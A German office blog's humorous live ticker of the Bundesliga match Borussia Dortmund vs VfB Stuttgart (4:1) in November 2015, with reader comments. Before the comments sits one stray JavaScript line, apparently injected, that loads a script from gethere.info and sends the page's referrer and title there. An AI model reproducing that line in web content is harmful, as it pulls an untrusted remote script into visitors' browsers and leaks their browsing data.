Ticker aktualisieren

 

14. Spieltag: Borussia Dortmund – VfB Stuttgart 4:1 (2:1)
  • 29. Nov 2015 - 05:21 PM

    Aus, Aus, Aus

    4:1 für Dortmund. Uns fehlen jetzt die Worte. Das war's. Bis zur nächsten VfB-Pleite.

  • 29. Nov 2015 - 05:20 PM

    4:1 Aubameyang (90.)

    Da ist es doch noch passiert: Aubameyang läuft Baumgärtl davon. Der Endstand? Noch wird gespielt. Dutt sieht auf der Bank aus, als würde er gleich den Trainer wechseln.

  • 29. Nov 2015 - 05:18 PM

    VfB vor der Sensation

    Nur 1:3 – dem VfB fehlen noch zwei Minuten zu einer faustdicken Überraschung.

  • 29. Nov 2015 - 05:09 PM

    VfB ist Spitze

  • 29. Nov 2015 - 05:03 PM

    Leon zittert

    Wer ist eigentlich Schulti66? Der hat beim DS9-Tippspiel den Abstand zu Spitzenreiter Leon Stand jetzt auf zehn Punkte reduziert. Der Kampf um die Herbstmeisterschaft scheint doch noch einmal spannend zu werden. Aus gut informierten Kreisen haben wir erfahren, dass Leon den Dreh des Herbstmeistervideos kurzfristig abgesagt hat.

    14ticker5

  • 29. Nov 2015 - 04:58 PM

    BVB stürmt

    Man kann 1:3 verlieren, aber warum stürmt der VfB wie Biene Maja auf Dope weiter ins Verderben? Der BVB vergibt einen Hochkaräter nach dem anderen. Könnte noch sehr bitter werden.

  • 29. Nov 2015 - 04:55 PM

    3:1 Eigentor (65.)

    Ich denke, da werden sich Niedermeier und Tyton noch richtig streiten, wem man dieses Eigentor zuschreiben muss.

  • 29. Nov 2015 - 04:52 PM

    Zettel-Wirtschaft

    Für den VfB scheint tatsächlich noch was drin zu sein. Vielleicht sollte Kramny den Gladbacher Schubert-Trick anwenden und seinen Spielern per Zettel neue Anweisungen geben. Wir haben da was vorbereitet. Elf DS9-Blöcke, denn eine Anweisung pro Spieler wird wohl nicht reichen.

    14ticker2

  • 29. Nov 2015 - 04:48 PM

    Danke, Gräfe

    Läuft alles für den VfB. Klarer Elfmeter für Dortmund nicht gepfiffen, dann ein Abseits gepfiffen, das keins war – danke Manuel Gräfe. Vielleicht hilft's ja.

  • 29. Nov 2015 - 04:37 PM

    Sturmtief Jürgen

    Dortmund lässt den VfB stürmen und kontert. Was macht Kramny? Und wie hieß noch mal das Tiefdruckgebiet in der vergangenen Woche? Jürgen? Reus und Aubameyang verpassen jedenfalls das dritte Tor.

  • 29. Nov 2015 - 04:29 PM

    Pausen-Update

    Prost!!

  • 29. Nov 2015 - 04:19 PM

    Pause

    2:1 für Dortmund. Im Moment hätten sieben Tipper einen Volltreffer, darunter auch Spitzenreiter Leon. Aber es wird nicht beim 2:1 bleiben. Wetten, dass ...?

  • 29. Nov 2015 - 04:14 PM

    2:1 Didavi (40.)

    Erst vergibt Werner, dann trifft Didavi nach einer Vorarbeit von Kostic. Vermutlich geht das Spiel 4:4 aus.

  • 29. Nov 2015 - 04:07 PM

    Fehler im System

    Das geht ja gar nicht. Wenn man Kramny eingibt, macht die Autokorrektur Grammy. Schön wär's.

  • 29. Nov 2015 - 03:59 PM

    Erste VfB-Chance

    Didavi schießt aufs Tor (28.). Wir schreiben's, es könnte ja die einzige bleiben.

  • 29. Nov 2015 - 03:55 PM

    111 gute Gründe

    Einmal VfB-Fan, immer VfB-Fan. Auch wenn's schwer fällt. Mile hat im Bücherregal gekramt und ein Motivationsbuch gefunden: 111 Gründe, warum man den VfB lieben muss. Passend. Leider gibt es im Buch nur leere Seiten.

    14ticker1

  • 29. Nov 2015 - 03:49 PM

    2:0 Aubameyang (19.)

    Das wars dann wohl. Nach 19. Minuten steht's 2:0 für Dortmund. Danke, dass Ihr unseren Ticker verfolgt habt. Ich würde mal sagen, der VfB hat ein Trainerproblem. Ach ja, das ist ja erst Kramnys erstes Spiel.

  • 29. Nov 2015 - 03:46 PM

    Trainerfrage

    Keine weiteren Tore. Daher widmen wir uns wichtigeren Dingen. Wer wird jetzt neuer Trainer? Vielleicht hätte Mile mal ans Telefon gehen sollen.

    14ticker4

  • 29. Nov 2015 - 03:34 PM

    1:0 Castro (3.)

    2:26 bis zum ersten Gegentor. Nicht schlecht.

  • 29. Nov 2015 - 03:14 PM

    Gute Nachricht

    Es steht noch 0:0. In fünf Minuten ist Anpfiff.

  • 29. Nov 2015 - 02:52 PM

    Stimmt

  • 29. Nov 2015 - 02:34 PM

    Kein Platz für Frust

    Noch knapp eine Stunde bis zum Anpfiff. Wir sind vorbereitet – Marcels Fristkiste ist leer. Denn heute brauchen wir nichts zur Fristbewältigung.

    14ticker3

  • 27. Nov 2015 - 03:02 PM

    Wir sind dabei

    Der Countdown läuft. Auch am Sonntag gibt es bei uns wieder einen Live-Ticker. Wir schauen genau hin, wenn der VfB in Dortmund antritt.

Load More
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Ähnliche Beiträge

11 Responses

  1. Marcel

    Gibt es heute -auch wenn der VfBäh erst morgen spielt- einen Ticker?
    Zumindest könnte bzw. wird Hoffenheim heute am VfBäh vorbeiziehen.

    Antworten
    • Mile

      Waren den ganzen Samstag in Ulm X-Mas-Power-Shopping. Außerdem sind die Hoffenheimer zu blöd, um am VfB vorbeizuziehen. Aber heute geht es ab.

      Antworten
    • Mile

      Sorry, vergaß, dass Du Bayern-Fan bist. Niederlage ist, wenn man gegen Hertha nicht mindestens drei Tore erzielt.

      Antworten
    • Mile

      Leider nein, ich war auf ner Geburtstagsfeier – zum Glück. Aber am Sonntag, 20.12., könnte ich wieder tickern. Dramatik beim Kampf um den Herbstmeistertitel beim Tippspiel.

      Antworten

Hinterlasse eine Antwort

Deine Email Adresse wird nicht veröffentlicht.